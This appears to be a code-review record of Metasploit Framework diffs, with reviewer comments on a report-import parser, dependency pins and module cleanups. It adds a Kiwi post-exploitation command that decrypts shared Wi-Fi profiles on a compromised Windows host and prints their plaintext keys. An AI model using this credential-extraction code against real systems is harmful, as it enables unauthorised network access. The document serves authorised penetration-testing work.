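Review bot: The new example line `Add a route for all hosts from 192.168.0.0 to 192.168.0.0 through session 1` gives the same address for both ends of the range; for the `255.255.255.0` / `/24` examples that follow it, it should read `from 192.168.0.0 to 192.168.0.255`. The first line `Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]` is then followed by a second `Usage:` block that restates the forms in more detail, so the one-line summary can be dropped to avoid two conflicting usages.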
|
||||
|
||||
|
|
|
@ -19,7 +19,7 @@ module Net # :nodoc:
|
|||
name = ""
|
||||
packetlen = packet.size
|
||||
while true
|
||||
raise ExpandError, "offset is greater than packet lenght!" if packetlen < (offset+1)
|
||||
raise ExpandError, "offset is greater than packet length!" if packetlen < (offset+1)
|
||||
len = packet.unpack("@#{offset} C")[0]
|
||||
|
||||
if len == 0
|
||||
|
|
|
@ -24,6 +24,7 @@ module Rex
|
|||
def start_document
|
||||
@parse_warnings = []
|
||||
@resolv_cache = {}
|
||||
@host_object = nil
|
||||
end
|
||||
|
||||
def start_element(name=nil,attrs=[])
|
||||
|
@ -32,9 +33,12 @@ module Rex
|
|||
@state[:current_tag][name] = true
|
||||
case name
|
||||
when "Scan" # Start of the thing.
|
||||
when "Name", "StartURL", "Banner", "Os"
|
||||
@state[:report_item] = {}
|
||||
when "Name", "StartURL", "StartTime", "Banner", "Os", "Text", "Severity", "CWE", "URL", "Parameter"
|
||||
@state[:has_text] = true
|
||||
when "LoginSequence" # Skipping for now
|
||||
when "ReportItem"
|
||||
@state[:report_item] = {}
|
||||
when "Crawler"
|
||||
record_crawler(attrs)
|
||||
when "FullURL"
|
||||
|
@ -62,14 +66,56 @@ module Rex
|
|||
# StartURL does not always include the scheme
|
||||
@text.prepend("http://") unless URI.parse(@text).scheme
|
||||
collect_host
|
||||
collect_service
|
||||
collect_service_from_url
|
||||
@text = nil
|
||||
handle_parse_warnings &block
|
||||
host_object = report_host &block
|
||||
if host_object
|
||||
report_starturl_service(host_object,&block)
|
||||
db.report_import_note(@args[:wspace],host_object)
|
||||
@host_object = report_host &block
|
||||
if @host_object
|
||||
report_starturl_service(&block)
|
||||
db.report_import_note(@args[:wspace],@host_object)
|
||||
end
|
||||
when "StartTime"
|
||||
@state[:has_text] = false
|
||||
@state[:timestamp] = @text.to_s.tr!(',','').tr!('/','-')
|
||||
@text = nil
|
||||
when "Text"
|
||||
@state[:has_text] = false
|
||||
service = collect_service_from_kbitem_text
|
||||
@text = nil
|
||||
return unless service
|
||||
handle_parse_warnings &block
|
||||
if @host_object
|
||||
report_kbitem_service(service,&block)
|
||||
end
|
||||
when "Severity"
|
||||
@state[:has_text] = false
|
||||
collect_report_item_severity
|
||||
@text = nil
|
||||
when "CWE"
|
||||
@state[:has_text] = false
|
||||
collect_report_item_cwe
|
||||
@text = nil
|
||||
when "URL"
|
||||
@state[:has_text] = false
|
||||
collect_report_item_reference_url
|
||||
@text = nil
|
||||
when "Parameter"
|
||||
@state[:has_text] = false
|
||||
collect_report_item_parameter
|
||||
@text = nil
|
||||
when "ReportItem"
|
||||
vuln = collect_vuln_from_report_item
|
||||
if vuln.nil?
|
||||
@state[:page_request] = @state[:page_response] = nil
|
||||
return
|
||||
end
|
||||
handle_parse_warnings &block
|
||||
if @state[:vuln_info][:refs].nil?
|
||||
report_web_vuln(&block)
|
||||
else
|
||||
report_other_vuln(&block)
|
||||
end
|
||||
@state[:page_request] = @state[:page_response] = nil
|
||||
when "Banner"
|
||||
@state[:has_text] = false
|
||||
collect_and_report_banner
|
||||
|
@ -134,7 +180,7 @@ module Rex
|
|||
@report_data[:state] = Msf::HostState::Alive
|
||||
end
|
||||
|
||||
def collect_service
|
||||
def collect_service_from_url
|
||||
return unless @report_data[:host]
|
||||
return unless in_tag("Scan")
|
||||
return unless @text
|
||||
|
@ -146,6 +192,44 @@ module Rex
|
|||
@report_data[:ports] << @state[:starturl_port]
|
||||
end
|
||||
|
||||
def collect_service_from_kbitem_text
|
||||
return unless @host_object
|
||||
return unless in_tag("Scan")
|
||||
return unless in_tag("KBase")
|
||||
return unless in_tag("KBItem")
|
||||
return unless @text
|
||||
return if @text.strip.empty?
|
||||
return unless @text =~ /server is running/
|
||||
matched = / (?<name>\w+) server is running on (?<proto>\w+) port (?<portnum>\d+)\./.match(@text)
|
||||
@report_data[:ports] ||= []
|
||||
@report_data[:ports] << matched[:portnum]
|
||||
return matched
|
||||
end
|
||||
|
||||
def collect_vuln_from_report_item
|
||||
@state[:vuln_info] = nil
|
||||
return unless @host_object
|
||||
return unless in_tag("Scan")
|
||||
return unless in_tag("ReportItems")
|
||||
return unless in_tag("ReportItem")
|
||||
return unless @state[:report_item][:name]
|
||||
return unless @state[:report_item][:severity]
|
||||
return unless @state[:report_item][:severity].downcase == "high"
|
||||
|
||||
@state[:vuln_info] = {}
|
||||
@state[:vuln_info][:name] = @state[:report_item][:name]
|
||||
if @state[:page_request_verb].nil? && @state[:report_item][:name] =~ /deprecated/
|
||||
# Treating this as a regular vuln, not web-specific
|
||||
@state[:vuln_info][:refs] = ["ACX-#{@state[:report_item][:reference_url]}"]
|
||||
unless @state[:report_item_cwe].nil?
|
||||
@state[:vuln_info][:refs][0] << ",#{@state[:report_item][:cwe]}"
|
||||
end
|
||||
end
|
||||
@state[:vuln_info][:severity] = @state[:report_item][:severity].downcase
|
||||
@state[:vuln_info][:cwe] = @state[:report_item][:cwe]
|
||||
return @state[:vuln_info]
|
||||
end
|
||||
|
||||
def collect_and_report_banner
|
||||
return unless (svc = @state[:starturl_service_object]) # Yes i want assignment
|
||||
return unless @text
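Review bot: In `collect_service_from_kbitem_text` the guard only checks `@text =~ /server is running/`, but the stricter regex assigned to `matched` can still fail (different wording, no port number), and `matched[:portnum]` then raises `NoMethodError` on nil; add `return unless matched` before using it. In `collect_vuln_from_report_item`, `unless @state[:report_item_cwe].nil?` tests a key nothing in this file sets — `collect_report_item_cwe` stores the value as `@state[:report_item][:cwe]` — so the `,#{@state[:report_item][:cwe]}` suffix is never appended; the condition should be `unless @state[:report_item][:cwe].nil?`. A related crash risk sits in the earlier hunk: `@state[:timestamp] = @text.to_s.tr!(',','').tr!('/','-')` chains `tr!`, which returns nil when it makes no substitution, so a timestamp without a comma raises and one without a slash stores nil; the non-bang `tr` is safe to chain.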
|
||||
|
@ -165,7 +249,37 @@ module Rex
|
|||
return unless in_tag("ReportItem")
|
||||
return unless @text
|
||||
return if @text.strip.empty?
|
||||
@state[:report_item] = @text
|
||||
@state[:report_item][:name] = @text
|
||||
end
|
||||
|
||||
def collect_report_item_severity
|
||||
return unless in_tag("ReportItem")
|
||||
return unless @text
|
||||
return if @text.strip.empty?
|
||||
@state[:report_item][:severity] = @text
|
||||
end
|
||||
|
||||
def collect_report_item_cwe
|
||||
return unless in_tag("ReportItem")
|
||||
return unless @text
|
||||
return if @text.strip.empty?
|
||||
@state[:report_item][:cwe] = @text
|
||||
end
|
||||
|
||||
def collect_report_item_reference_url
|
||||
return unless in_tag("ReportItem")
|
||||
return unless in_tag("References")
|
||||
return unless in_tag("Reference")
|
||||
return unless @text
|
||||
return if @text.strip.empty?
|
||||
@state[:report_item][:reference_url] = @text
|
||||
end
|
||||
|
||||
def collect_report_item_parameter
|
||||
return unless in_tag("ReportItem")
|
||||
return unless @text
|
||||
return if @text.strip.empty?
|
||||
@state[:report_item][:parameter] = @text
|
||||
end
|
||||
|
||||
# @state[:fullurl] is set by report_web_site
|
||||
|
@ -211,20 +325,26 @@ module Rex
|
|||
def report_web_page(&block)
|
||||
return if should_skip_this_page
|
||||
return unless @state[:web_site]
|
||||
@state[:page_request_verb] = nil
|
||||
return unless @state[:page_request]
|
||||
return if @state[:page_request].strip.empty?
|
||||
return unless @state[:page_response]
|
||||
return if @state[:page_response].strip.empty?
|
||||
path,query_string = parse_request(@state[:page_request])
|
||||
verb,path,query_string = parse_request(@state[:page_request])
|
||||
return unless path
|
||||
@state[:page_request_verb] = verb
|
||||
web_page_info = {}
|
||||
if @state[:page_response].strip.blank?
|
||||
web_page_info[:code] = ""
|
||||
web_page_info[:headers] = {}
|
||||
web_page_info[:body] = ""
|
||||
else
|
||||
parsed_response = parse_response(@state[:page_response])
|
||||
return unless parsed_response
|
||||
web_page_info = {}
|
||||
web_page_info[:web_site] = @state[:web_site]
|
||||
web_page_info[:path] = path
|
||||
web_page_info[:code] = parsed_response[:code].to_i
|
||||
web_page_info[:headers] = parsed_response[:headers]
|
||||
web_page_info[:body] = parsed_response[:body]
|
||||
end
|
||||
web_page_info[:web_site] = @state[:web_site]
|
||||
web_page_info[:path] = path
|
||||
web_page_info[:query] = query_string || ""
|
||||
url = ""
|
||||
url << @state[:web_site].service.name.to_s << "://"
|
||||
|
@ -234,13 +354,51 @@ module Rex
|
|||
return unless uri # Sanity checker
|
||||
db.emit(:web_page, url, &block) if block
|
||||
web_page_object = db_report(:web_page,web_page_info)
|
||||
@state[:page_request] = @state[:page_response] = nil
|
||||
@state[:web_page] = web_page_object
|
||||
end
|
||||
|
||||
def report_web_vuln(&block)
|
||||
return if should_skip_this_page
|
||||
return unless @state[:web_page]
|
||||
return unless @state[:web_site]
|
||||
return unless @state[:vuln_info]
|
||||
|
||||
web_vuln_info = {}
|
||||
web_vuln_info[:web_site] = @state[:web_site]
|
||||
web_vuln_info[:path] = @state[:web_page][:path]
|
||||
web_vuln_info[:query] = @state[:web_page][:query]
|
||||
web_vuln_info[:method] = @state[:page_request_verb]
|
||||
web_vuln_info[:pname] = ""
|
||||
if @state[:page_response].blank?
|
||||
web_vuln_info[:proof] = "<empty response>"
|
||||
else
|
||||
web_vuln_info[:proof] = @state[:page_response]
|
||||
end
|
||||
web_vuln_info[:risk] = 5
|
||||
web_vuln_info[:params] = []
|
||||
unless @state[:report_item][:parameter].blank?
|
||||
# Acunetix only lists a single paramter...
|
||||
web_vuln_info[:params] << [ @state[:report_item][:parameter].to_s, "" ]
|
||||
end
|
||||
web_vuln_info[:category] = "imported"
|
||||
web_vuln_info[:confidence] = 100
|
||||
web_vuln_info[:name] = @state[:vuln_info][:name]
|
||||
|
||||
db.emit(:web_vuln, web_vuln_info[:name], &block) if block
|
||||
vuln = db_report(:web_vuln, web_vuln_info)
|
||||
end
|
||||
|
||||
def report_other_vuln(&block)
|
||||
return if should_skip_this_page
|
||||
return unless @state[:vuln_info]
|
||||
|
||||
db.emit(:vuln, @state[:vuln_info][:name], &block) if block
|
||||
db_report(:vuln, @state[:vuln_info].merge(:host => @host_object))
|
||||
end
|
||||
|
||||
# Reasons why we shouldn't collect a particular web page.
|
||||
def should_skip_this_page
|
||||
if @state[:report_item] =~ /Unrestricted File Upload/
|
||||
if @state[:report_item][:name] =~ /Unrestricted File Upload/
|
||||
# This means that the page being collected is something the
|
||||
# auditor put there, so it's not useful to report on.
|
||||
return true
|
||||
|
@ -259,6 +417,7 @@ module Rex
|
|||
return unless verb
|
||||
return unless req
|
||||
path,query_string = req.split(/\?/)[0,2]
|
||||
return verb,path,query_string
|
||||
end
|
||||
|
||||
def parse_response(response)
|
||||
|
@ -302,14 +461,14 @@ module Rex
|
|||
|
||||
# The service is super important, so we hang on to it for the
|
||||
# rest of the scan.
|
||||
def report_starturl_service(host_object,&block)
|
||||
return unless host_object
|
||||
def report_starturl_service(&block)
|
||||
return unless @host_object
|
||||
return unless @state[:starturl_uri]
|
||||
name = @state[:starturl_uri].scheme
|
||||
port = @state[:starturl_uri].port
|
||||
addr = host_object.address
|
||||
addr = @host_object.address
|
||||
svc = {
|
||||
:host => host_object,
|
||||
:host => @host_object,
|
||||
:port => port,
|
||||
:name => name.dup,
|
||||
:proto => "tcp"
|
||||
|
@ -320,6 +479,22 @@ module Rex
|
|||
end
|
||||
end
|
||||
|
||||
def report_kbitem_service(service,&block)
|
||||
return unless @host_object
|
||||
return unless @state[:starturl_uri]
|
||||
addr = @host_object.address
|
||||
svc = {
|
||||
:host => @host_object,
|
||||
:port => service[:portnum].to_i,
|
||||
:name => service[:name].dup.downcase,
|
||||
:proto => service[:proto].dup.downcase
|
||||
}
|
||||
if service[:name] and service[:portnum]
|
||||
db.emit(:service,[addr,service[:portnum]].join(":"),&block) if block
|
||||
db_report(:service,svc)
|
||||
end
|
||||
end
|
||||
|
||||
def report_web_site(url,&block)
|
||||
return unless in_tag("Crawler")
|
||||
return unless url
|
||||
|
|
|
@ -66,7 +66,7 @@ module Rex
|
|||
# @param len [Integer] An optional URI length value, including the leading slash
|
||||
# @return [String] The URI string for connections
|
||||
def generate_uri_uuid(sum, uuid, len=nil)
|
||||
curl_uri_len = URI_CHECKSUM_UUID_MIN_LEN+rand(URI_CHECKSUM_CONN_MAX_LEN-URI_CHECKSUM_UUID_MIN_LEN)
|
||||
curl_uri_len = URI_CHECKSUM_UUID_MIN_LEN + rand(URI_CHECKSUM_CONN_MAX_LEN - URI_CHECKSUM_UUID_MIN_LEN)
|
||||
curl_prefix = uuid.to_uri
|
||||
|
||||
if len
|
||||
|
|
|
@ -379,6 +379,57 @@ class Kiwi < Extension
|
|||
content.join('')
|
||||
end
|
||||
|
||||
#
|
||||
# Access and parse a set of wifi profiles using the given interfaces
|
||||
# list, which contains the list of profile xml files on the target.
|
||||
#
|
||||
# @return [Hash]
|
||||
def wifi_parse_shared(wifi_interfaces)
|
||||
results = []
|
||||
|
||||
exec_cmd('"base64 /in:off /out:on"')
|
||||
wifi_interfaces.keys.each do |key|
|
||||
interface = {
|
||||
:guid => key,
|
||||
:desc => nil,
|
||||
:state => nil,
|
||||
:profiles => []
|
||||
}
|
||||
|
||||
wifi_interfaces[key].each do |wifi_profile_path|
|
||||
cmd = "\"dpapi::wifi /in:#{wifi_profile_path} /unprotect\""
|
||||
output = exec_cmd(cmd)
|
||||
|
||||
lines = output.lines
|
||||
|
||||
profile = {
|
||||
:name => nil,
|
||||
:auth => nil,
|
||||
:key_type => nil,
|
||||
:shared_key => nil
|
||||
}
|
||||
|
||||
while lines.length > 0 do
|
||||
line = lines.shift.strip
|
||||
if line =~ /^\* SSID name\s*: (.*)$/
|
||||
profile[:name] = $1
|
||||
elsif line =~ /^\* Authentication\s*: (.*)$/
|
||||
profile[:auth] = $1
|
||||
elsif line =~ /^\* Key Material\s*: (.*)$/
|
||||
profile[:shared_key] = $1
|
||||
end
|
||||
end
|
||||
|
||||
interface[:profiles] << profile
|
||||
end
|
||||
|
||||
results << interface
|
||||
end
|
||||
exec_cmd('"base64 /in:on /out:on"')
|
||||
|
||||
results
|
||||
end
|
||||
|
||||
#
|
||||
# List all the wifi interfaces and the profiles associated
|
||||
# with them. Also show the raw text passwords for each.
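Review bot: `wifi_parse_shared` switches base64 input off with `exec_cmd('"base64 /in:off /out:on"')` and only switches it back on after the loop, so if `exec_cmd(cmd)` raises for one profile the extension is left with `/in:off` for every later command in the session; wrap the loop in `begin … ensure exec_cmd('"base64 /in:on /out:on"') end`. The doc comment says `# @return [Hash]` but `results` is an Array of interface hashes, so `# @return [Array<Hash>]` is accurate. `profile[:key_type]` is initialised to nil and no branch of the line parser ever assigns it, so it is always nil in the result. Style: `wifi_interfaces.keys.each do |key| … wifi_interfaces[key].each` is `wifi_interfaces.each do |key, profile_paths|`, and `while lines.length > 0 do … lines.shift` is `output.each_line do |line|`.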
|
||||
|
|
|
@ -72,7 +72,8 @@ class Console::CommandDispatcher::Kiwi
|
|||
'kerberos_ticket_list' => 'List all kerberos tickets (unparsed)',
|
||||
'lsa_dump_secrets' => 'Dump LSA secrets (unparsed)',
|
||||
'lsa_dump_sam' => 'Dump LSA SAM (unparsed)',
|
||||
'wifi_list' => 'List wifi profiles/creds',
|
||||
'wifi_list' => 'List wifi profiles/creds for the current user',
|
||||
'wifi_list_shared' => 'List shared wifi profiles/creds (requires SYSTEM)',
|
||||
}
|
||||
end
|
||||
|
||||
|
@ -303,37 +304,50 @@ class Console::CommandDispatcher::Kiwi
|
|||
end
|
||||
|
||||
#
|
||||
# Dump all the wifi profiles/credentials
|
||||
# Dump all the shared wifi profiles/credentials
|
||||
#
|
||||
def cmd_wifi_list_shared(*args)
|
||||
interfaces_dir = '%AllUsersProfile%\Microsoft\Wlansvc\Profiles\Interfaces'
|
||||
interfaces_dir = client.fs.file.expand_path(interfaces_dir)
|
||||
files = client.fs.file.search(interfaces_dir, '*.xml', true)
|
||||
|
||||
if files.length == 0
|
||||
print_error('No shared WiFi profiles found.')
|
||||
else
|
||||
interfaces = {}
|
||||
files.each do |f|
|
||||
interface_guid = f['path'].split("\\")[-1]
|
||||
full_path = "#{f['path']}\\#{f['name']}"
|
||||
|
||||
interfaces[interface_guid] ||= []
|
||||
interfaces[interface_guid] << full_path
|
||||
end
|
||||
results = client.kiwi.wifi_parse_shared(interfaces)
|
||||
|
||||
if results.length > 0
|
||||
display_wifi_profiles(results)
|
||||
else
|
||||
print_line
|
||||
print_error('No shared wireless profiles found on the target.')
|
||||
end
|
||||
end
|
||||
|
||||
true
|
||||
end
|
||||
|
||||
#
|
||||
# Dump all the wifi profiles/credentials for the current user
|
||||
#
|
||||
def cmd_wifi_list(*args)
|
||||
results = client.kiwi.wifi_list
|
||||
|
||||
if results.length > 0
|
||||
results.each do |r|
|
||||
table = Rex::Text::Table.new(
|
||||
'Header' => "#{r[:desc]} - #{r[:guid]}",
|
||||
'Indent' => 0,
|
||||
'SortIndex' => 0,
|
||||
'Columns' => [
|
||||
'Name', 'Auth', 'Type', 'Shared Key'
|
||||
]
|
||||
)
|
||||
|
||||
print_line
|
||||
r[:profiles].each do |p|
|
||||
table << [p[:name], p[:auth], p[:key_type], p[:shared_key]]
|
||||
end
|
||||
|
||||
print_line(table.to_s)
|
||||
print_line("State: #{r[:state]}")
|
||||
end
|
||||
display_wifi_profiles(results)
|
||||
else
|
||||
print_line
|
||||
print_error('No wireless profiles found on the target.')
|
||||
end
|
||||
|
||||
print_line
|
||||
return true
|
||||
true
|
||||
end
|
||||
|
||||
@@creds_opts = Rex::Parser::Arguments.new(
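Review bot: `cmd_wifi_list_shared` never checks the privilege its help string promises (`'List shared wifi profiles/creds (requires SYSTEM)'` in the first hunk of this file): it goes straight to `client.fs.file.search`, so a non-SYSTEM session gets an opaque search or dpapi failure instead of a clear message. `client.sys.config.is_system?` is already used in this file by `check_is_domain_user`, so a guard such as `unless client.sys.config.is_system?` followed by `print_error('This command requires SYSTEM.'); return true` at the top of the method would say so up front. Style: `files.length == 0` reads as `files.empty?`, `f['path'].split("\\")[-1]` as `.last`, and the unused `*args` in both commands can be `*_args`.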
|
||||
|
@ -401,6 +415,30 @@ class Console::CommandDispatcher::Kiwi
|
|||
|
||||
protected
|
||||
|
||||
def display_wifi_profiles(profiles)
|
||||
profiles.each do |r|
|
||||
header = r[:guid]
|
||||
header = "#{r[:desc]} - #{header}" if r[:desc]
|
||||
table = Rex::Text::Table.new(
|
||||
'Header' => header,
|
||||
'Indent' => 0,
|
||||
'SortIndex' => 0,
|
||||
'Columns' => [
|
||||
'Name', 'Auth', 'Type', 'Shared Key'
|
||||
]
|
||||
)
|
||||
|
||||
print_line
|
||||
r[:profiles].each do |p|
|
||||
table << [p[:name], p[:auth], p[:key_type] || 'Unknown', p[:shared_key]]
|
||||
end
|
||||
|
||||
print_line(table.to_s)
|
||||
print_line("State: #{r[:state] || 'Unknown'}")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def check_is_domain_user(msg='Running as SYSTEM, function will not work.')
|
||||
if client.sys.config.is_system?
|
||||
print_warning(msg)
|
||||
|
|
|
@ -58,7 +58,7 @@ class Console::CommandDispatcher::Stdapi::Net
|
|||
'-r' => [true, 'Forward: remote host to connect to.'],
|
||||
'-p' => [true, 'Forward: remote port to connect to. Reverse: remote port to listen on.'],
|
||||
'-R' => [false, 'Indicates a reverse port forward.'],
|
||||
'-L' => [true, 'Forward: local host to listen on (optional). Remote: local host to connect to.'])
|
||||
'-L' => [true, 'Forward: local host to listen on (optional). Reverse: local host to connect to.'])
|
||||
|
||||
#
|
||||
# Options for the netstat command.
|
||||
|
|
|
@ -65,9 +65,9 @@ Gem::Specification.new do |spec|
|
|||
# are needed when there's no database
|
||||
spec.add_runtime_dependency 'metasploit-model'
|
||||
# Needed for Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.2.24'
|
||||
spec.add_runtime_dependency 'metasploit-payloads', '1.2.28'
|
||||
# Needed for the next-generation POSIX Meterpreter
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.8'
|
||||
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.9'
|
||||
# Needed by msfgui and other rpc components
|
||||
spec.add_runtime_dependency 'msgpack'
|
||||
# get list of network interfaces, like eth* from OS.
|
||||
|
@ -77,7 +77,7 @@ Gem::Specification.new do |spec|
|
|||
# Needed by anemone crawler
|
||||
spec.add_runtime_dependency 'nokogiri'
|
||||
# Needed by db.rb and Msf::Exploit::Capture
|
||||
spec.add_runtime_dependency 'packetfu', '1.1.13.pre'
|
||||
spec.add_runtime_dependency 'packetfu'
|
||||
# For sniffer and raw socket modules
|
||||
spec.add_runtime_dependency 'pcaprub'
|
||||
# Needed for module caching in Mdm::ModuleDetails
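Review bot: The `packetfu` dependency loses its version constraint entirely (`spec.add_runtime_dependency 'packetfu'`) while the neighbouring `metasploit-payloads` and `metasploit_payloads-mettle` lines stay pinned to exact releases; an unconstrained runtime dependency lets any future packetfu release satisfy a fresh `bundle install` outside the lockfile. A pessimistic constraint on the release that replaced `1.1.13.pre` (`spec.add_runtime_dependency 'packetfu', '~> <version>'`, with the actual release filled in) keeps upgrades deliberate without reinstating the pre-release pin.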
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -35,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
|
@ -61,7 +59,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
OptBool.new('HIDE_IFRAME', [
|
||||
true, "Hide the exploit iframe from the user", true
|
||||
])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -37,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
OptInt.new('TIME', [true, 'Time in seconds to show the image', 10]),
|
||||
OptPath.new('FILE', [true, 'Image to upload and show']),
|
||||
OptString.new('HttpPassword', [false, 'The password for AppleTV AirPlay'])
|
||||
], self.class)
|
||||
])
|
||||
|
||||
# We're not actually using any of these against AppleTV in our Rex HTTP client init,
|
||||
# so deregister them so we don't overwhelm the user with fake options.
|
||||
|
|
|
@ -3,7 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'uri'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
@ -42,7 +41,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
OptInt.new('TIME', [true, 'Time in seconds to show the video', 60]),
|
||||
OptString.new('URL', [true, 'URL of video to show. Must use an IP address']),
|
||||
OptString.new('HttpPassword', [false, 'The password for AppleTV AirPlay'])
|
||||
], self.class)
|
||||
])
|
||||
|
||||
# We're not actually using any of these against AppleTV in our Rex HTTP client init,
|
||||
# so deregister them so we don't overwhelm the user with fake options.
|
||||
|
|
|
@ -4,8 +4,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
include Msf::Auxiliary::Report
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
|
|
@ -3,7 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'metasploit/framework/aws/client'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
|
|
@ -4,8 +4,6 @@
|
|||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
@ -41,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(10000),
|
||||
OptAddress.new('LHOST',
|
||||
OptAddressLocal.new('LHOST',
|
||||
[
|
||||
false,
|
||||
"The local IP address to accept the data connection"
|
||||
|
@ -67,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
"backupexec_dump.mtf"
|
||||
]
|
||||
),
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -4,8 +4,6 @@
|
|||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
@ -48,7 +46,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
"Compromised by Metasploit!\r\n"
|
||||
]
|
||||
),
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def auxiliary_commands
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
register_options([
|
||||
Opt::RPORT(8008)
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options([
|
||||
Opt::RPORT(8008),
|
||||
OptString.new('VID', [true, 'Video ID', 'kxopViU98Xo'])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -2,8 +2,6 @@
|
|||
# auxiliary/admin/cisco/cisco_asa_extrabacon.rb
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::SNMPClient
|
||||
|
@ -46,7 +44,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
|
||||
register_options([
|
||||
OptEnum.new('ASAVER', [ false, 'Target ASA version (default autodetect)', 'auto', ['auto']+@offsets.keys]),
|
||||
], self.class)
|
||||
])
|
||||
|
||||
deregister_options("VERSION")
|
||||
datastore['VERSION'] = '2c' # SNMP v. 2c required it seems
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -40,7 +38,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
OptString.new('USERNAME', [true, 'Username to use', '']),
|
||||
OptString.new('PASSWORD', [true, 'Password to use', '']),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true])
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run_host(ip)
|
||||
|
|
|
@ -4,8 +4,6 @@
|
|||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
@ -36,7 +34,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(21),
|
||||
], self.class)
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -3,8 +3,6 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::SMB::Client
|
||||
|
@ -33,7 +31,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
OptString.new('CMD', [ true, 'The command to execute', 'ver']),
|
||||
OptString.new('SMBUser', [ true, 'The username to authenticate as', 'db2admin']),
|
||||
OptString.new('SMBPass', [ true, 'The password for the specified username', 'db2admin'])
|
||||
], self.class )
|
||||
])
|
||||
end
|
||||
|
||||
def run
|
||||
|
|
|
@ -4,8 +4,6 @@
|
|||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class MetasploitModule < Msf::Auxiliary
|
||||
|
||||
|
@ -31,7 +29,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
register_options([
|
||||
Opt::RPORT(8030),
|
||||
OptBool.new('SSL', [true, 'Use SSL', true])
|
||||
], self.class)
|
||||
])
|
||||
